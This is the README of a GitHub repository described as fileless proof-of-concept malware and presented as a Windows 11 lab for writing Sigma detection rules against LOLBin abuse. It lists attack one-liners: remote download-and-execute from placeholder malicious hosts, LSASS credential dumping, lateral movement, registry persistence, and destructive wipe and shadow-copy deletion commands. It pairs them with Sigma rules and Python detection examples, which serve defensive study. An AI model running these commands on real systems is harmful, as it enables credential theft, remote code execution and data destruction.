https://github.com/P1rat3L00t/Blu3F1R3

Fileless PoC malware for educational & security research purposes.
anydesk blue-team bsod fileless-malware living-off-the-land log-analysis lolbins loldrivers mitre-attack purple-team ransom-note red-teaming reflective-dll registry-keys threat-detection windows-11

README


# Windows 11 Threat Detection & Threat Intel via Sigma + MITRE ATT&CK + LOLBins

> **Warning**
> This project is for **educational, authorized research, and blue team simulation in isolated lab environments only**.
> **Do not test on production or unauthorized systems.
> The authors are NOT responsible for misuse.**

---

![Threat Detection](https://github.com/user-attachments/assets/0360c1d6-32c1-416b-a93a-a02822d7a536)

---

## Table of Contents

- [About](#about)
- [Technical Overview](#technical-overview)
- [Attack Chain Example (PowerShell)](#attack-chain-example-powershell)
- [Reconnaissance and LOLBins](#reconnaissance-and-lolbins)
- [Advanced Techniques](#advanced-techniques)
- [MITRE ATT&CK + Sigma Mapping](#mitre-attck--sigma-mapping)
- [Destructive LOLBin Payloads](#destructive-lolbin-payloads)
- [Log-Based Detection Engineering](#log-based-detection-engineering)
- [Legal Disclaimer](#legal-disclaimer)
- [References & Further Reading](#references--further-reading)

---

## About

This lab-oriented simulation demonstrates fileless attack chains using LOLBins and post-exploitation techniques on **Windows 11**. It is built to aid:

- Blue teamers in building custom **Sigma detection rules**.
- Threat hunters studying MITRE ATT&CK tactics mapped to native Windows activity.
- Log analysts working with **Sysmon, Event Viewer, and EVTX files**.

---

## Technical Overview

The project mimics advanced attacker behavior using trusted Windows binaries and in-memory payload delivery. Coverage includes:

- **Initial Access & Execution:** Abuse of `rundll32`, `regsvr32`, `certutil`, etc.
- **Privilege Escalation:** Print Spooler CVEs, HiveNightmare, SeriousSAM.
- **Credential Access:** LSASS dump, SAM parsing.
- **Lateral Movement:** `wmic`, `PowerShell` remoting.
- **Destruction/Impact:** Payload encryption or wipe using only built-in tools.

These stages are aligned with **MITRE ATT&CK** and tailored for **log analysis via Sigma rules and Sysmon events**.

---

## Attack Chain Example (PowerShell)

A practical simulation using LOLBins and stealthy PowerShell:

```powershell
# Initial Access
IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/dropper.ps1")

# Reflective DLL Injection
rundll32.exe \\192.168.X.X\share\payload.dll,ReflectEntry

# Privilege Escalation
Start-Process powershell -Args "-ExecutionPolicy Bypass -File C:\Temp\elevate.ps1" -Verb RunAs

# Credential Dumping
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Temp\lsass.dmp full

# Lateral Movement
wmic /node:targetPC process call create "powershell.exe -File \\share\payload.ps1"

# Persistence via Registry
Set-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Persistence" -Value "powershell -File C:\Temp\persist.ps1"
```

---

## Reconnaissance and LOLBins

### LOLBins (Living Off the Land Binaries)

These built-in binaries are abused for fileless execution:

```cmd
regsvr32 /s /n /u /i:http://evil/payload.sct scrobj.dll
certutil -urlcache -split -f http://evil/payload.b64 drop.exe
rundll32.exe \\192.168.X.X\share\payload.dll,ReflectEntry
```

Use Sigma to flag any suspicious use of these:

```yaml
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\rundll32.exe'
    CommandLine|contains: '\\'   # UNC path in the arguments, e.g. \\host\share\payload.dll
  condition: selection
```

---

## Advanced Techniques

### Fileless Embedding via Native Tools

```cmd
copy /b clean.jpg + malware.7z clean.jpg
certutil -decode clean.jpg payload.7z
7z x payload.7z -oC:\Temp\
```

### Reflective DLL Execution (In-Memory)

```cmd
rundll32.exe \\evilhost\malicious.dll,ReflectEntry
```

Track these behaviors via **Sysmon Event ID 1 (process creation) and Event ID 7 (image load)**, and use Sigma rules to flag DLLs executed from remote (UNC) paths or abnormal image loads.

---

## MITRE ATT&CK + Sigma Mapping

| Tactic | Technique | ATT&CK ID | Sigma Detection Focus |
| -------------------- | ----------------------------- | ---------------- | -------------------------------------------- |
| Initial Access | Malicious Office/Payload Drop | T1203 | Office macros, outbound HTTP from MS Office |
| Execution | LOLBins & Scripting | T1218, T1059 | regsvr32, rundll32, powershell, certutil |
| Privilege Escalation | Print Spooler, Hive ACL | T1068, T1003.002 | Spoolsv.exe anomalies, SAM/LSASS file access |
| Credential Access | LSASS Dump, SAM Access | T1003 | Access to lsass, use of comsvcs.dll |
| Lateral Movement | Remote Service Execution | T1021.002 | wmic, psexec, and abnormal remote processes |
| Impact | File Encryption, VSS Deletion | T1486, T1490 | vssadmin, cipher.exe, shadow copy deletion |

---

## Destructive LOLBin Payloads

Used in impact or ransomware simulation phases:

```cmd
cipher /w:C:\
vssadmin delete shadows /all /quiet
bcdedit /set {default} recoveryenabled No
forfiles /p C:\ /s /d -2 /c "cmd /c del /q @file"
```

Sigma Detection Example:

```yaml
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    CommandLine|contains: 'cipher /w'
  condition: selection
```
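As an added example (not part of the original project), the following Python evaluates this rule and the rundll32 UNC-path rule from the LOLBins section against constructed Sysmon Event ID 1 records, plus a third rule for the shadow-copy deletion row of the mapping table. The modifier handling is a minimal reimplementation of Sigma semantics, not `sigma-cli`.

```python
# Added example, not the project's own code: a minimal evaluator for the Sigma
# 'detection' fragments in this README, run over constructed Sysmon Event ID 1
# records (contains/endswith/all modifiers, bare 'condition: <selection>'; case-insensitive).
RULES = {  # same structure as the YAML rules above, expressed as Python dicts
    "rundll32_unc_path": {
        "selection": {"Image|endswith": "\\rundll32.exe", "CommandLine|contains": "\\\\"},
        "condition": "selection"},
    "cipher_wipe": {
        "selection": {"CommandLine|contains": "cipher /w"}, "condition": "selection"},
    "shadow_copy_deletion": {  # generalises the Impact row of the mapping table
        "selection": {"Image|endswith": "\\vssadmin.exe",
                      "CommandLine|contains|all": ["delete", "shadows"]},
        "condition": "selection"},
}

def field_matches(value, modifiers, patterns):
    """Apply Sigma string modifiers to one field value (case-insensitive)."""
    v = str(value).lower()
    pats = [str(p).lower() for p in (patterns if isinstance(patterns, list) else [patterns])]
    def one(p):
        if "contains" in modifiers:
            return p in v
        if "endswith" in modifiers:
            return v.endswith(p)
        return v == p  # no modifier: exact match
    hits = [one(p) for p in pats]
    return all(hits) if "all" in modifiers else any(hits)

def selection_matches(selection, event):
    """Clauses in one selection map are ANDed; a missing field never matches."""
    for key, patterns in selection.items():
        field, *mods = key.split("|")
        if field not in event or not field_matches(event[field], mods, patterns):
            return False
    return True

def evaluate(event, rules=RULES):
    """Return the names of all rules whose condition fires on this event."""
    return [name for name, det in rules.items()
            if selection_matches(det[det["condition"]], event)]

EVENTS = [  # constructed Sysmon Event ID 1 records, not real telemetry
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\192.168.X.X\share\payload.dll,ReflectEntry"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},  # benign, no UNC path
    {"Image": r"C:\Windows\System32\cipher.exe", "CommandLine": "cipher /w:C:\\"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet"},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "CommandLine": "vssadmin list shadows"},
]
```

Running `evaluate` over `EVENTS` fires exactly one rule on the first, third and fourth records and nothing on the two benign ones.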

---

## Log-Based Detection Engineering

### Recommended Setup

* **Sysmon Configuration:** Use [SwiftOnSecurity's sysmon config](https://github.com/SwiftOnSecurity/sysmon-config)
* **Log Sources:**
  * Microsoft-Windows-Sysmon/Operational
  * Security.evtx
  * Windows PowerShell logs
  * WMI Activity logs

### Tools

* **Sigma:** Convert rules to Splunk/ELK queries with `sigmac` (now deprecated) or its successor `sigma-cli`.
* **EvtxECmd or Chainsaw:** Parse `.evtx` offline for hunting.
* **RedCanary’s Atomic Red Team:** For validation testing.

### Key Sigma Triggers

| Sysmon Event ID | Trigger Description |
| --------------- | ------------------------------------------------ |
| 1 | Process creation (e.g. rundll32, certutil) |
| 7 | Image loaded (e.g. non-Microsoft or unsigned DLLs) |
| 11 | File creation (e.g. lsass.dmp, .7z) |
| 13 | Registry value set (e.g. Run-key persistence) |
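Added example, not from the project: a parser for Sysmon events in the XML layout that EVTX export tools produce, routing each event to one of the trigger rows above by Event ID and the Sysmon field that row depends on. The `sysmon_xml` builder and all sample events are constructed for the demo.

```python
# Added example, not the project's own code: parses Sysmon events in the XML
# shape EVTX tools export and routes them to the four trigger rows above.
# All events below are constructed; the field names are Sysmon's own.
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
LOLBINS = ("rundll32.exe", "certutil.exe", "regsvr32.exe", "cipher.exe", "vssadmin.exe")

def parse_sysmon_event(xml_text):
    """Flatten one <Event> into {'EventID': int, <Data Name>: text, ...}."""
    root = ET.fromstring(xml_text)
    ev = {"EventID": int(root.find(f"{NS}System/{NS}EventID").text)}
    for d in root.iter(f"{NS}Data"):
        ev[d.get("Name")] = d.text or ""
    return ev

def triage(ev):
    """Return the trigger label an event hits, or None if it hits no row."""
    eid = ev["EventID"]
    if eid == 1 and ev.get("Image", "").lower().endswith(LOLBINS):
        return "EID1 LOLBin process creation"
    # EID 7: Signature holds the signer name; empty or non-Microsoft is the table's trigger
    if eid == 7 and not ev.get("Signature", "").lower().startswith("microsoft"):
        return "EID7 non-Microsoft image load"
    if eid == 11 and ev.get("TargetFilename", "").lower().endswith((".dmp", ".7z")):
        return "EID11 suspicious file creation"
    if eid == 13 and "\\currentversion\\run" in ev.get("TargetObject", "").lower():
        return "EID13 Run-key persistence"
    return None

def triage_all(xml_events):
    return [triage(parse_sysmon_event(x)) for x in xml_events]

def sysmon_xml(eid, **data):
    """Build a constructed Sysmon event string (same layout as an EVTX XML export)."""
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS[1:-1]}"><System><Provider Name="Microsoft-Windows-Sysmon"/>'
            f'<EventID>{eid}</EventID></System><EventData>{fields}</EventData></Event>')

SAMPLE = [  # constructed, not real telemetry
    sysmon_xml(1, Image=r"C:\Windows\System32\rundll32.exe",
               CommandLine=r"rundll32.exe \\192.168.X.X\share\payload.dll,ReflectEntry"),
    sysmon_xml(7, Image=r"C:\Windows\System32\rundll32.exe",
               ImageLoaded=r"C:\Temp\payload.dll", Signed="false", Signature=""),
    sysmon_xml(7, Image=r"C:\Windows\explorer.exe",
               ImageLoaded=r"C:\Windows\System32\shell32.dll", Signature="Microsoft Windows"),
    sysmon_xml(11, Image=r"C:\Windows\System32\rundll32.exe", TargetFilename=r"C:\Temp\lsass.dmp"),
    sysmon_xml(13, Image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               TargetObject=r"HKU\S-1-5-21-PLACEHOLDER\Software\Microsoft\Windows\CurrentVersion\Run\Persistence"),
]
```

`triage_all(SAMPLE)` labels four of the five events; the Microsoft-signed `shell32.dll` load is the deliberate non-match.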

---

## Legal Disclaimer

> All tools, code, and techniques are shared purely for authorized learning and research.
> Use only in test environments and always adhere to ethical and legal standards.
> The authors **take no responsibility** for misuse.

---

## References & Further Reading

* [Sigma HQ](https://github.com/SigmaHQ/sigma)
* [LOLBas Project](https://lolbas-project.github.io/)
* [Sysmon](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon)
* [MITRE ATT&CK](https://attack.mitre.org/)
* [Chainsaw - Rapid Log Analysis](https://github.com/countercept/chainsaw)
* [EvtxECmd](https://ericzimmerman.github.io/)
* [Atomic Red Team](https://github.com/redcanaryco/atomic-red-team)
* [Print Spooler Exploits](https://itm4n.github.io/printnightmare-not-over/)